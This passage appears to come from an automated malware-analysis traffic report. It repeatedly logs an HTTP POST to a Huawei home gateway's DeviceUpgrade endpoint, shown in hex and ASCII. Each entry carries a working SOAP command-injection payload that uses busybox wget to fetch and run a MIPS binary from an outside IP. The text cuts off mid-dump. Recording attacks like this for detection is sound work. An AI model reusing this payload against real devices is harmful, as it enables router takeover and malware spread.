53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 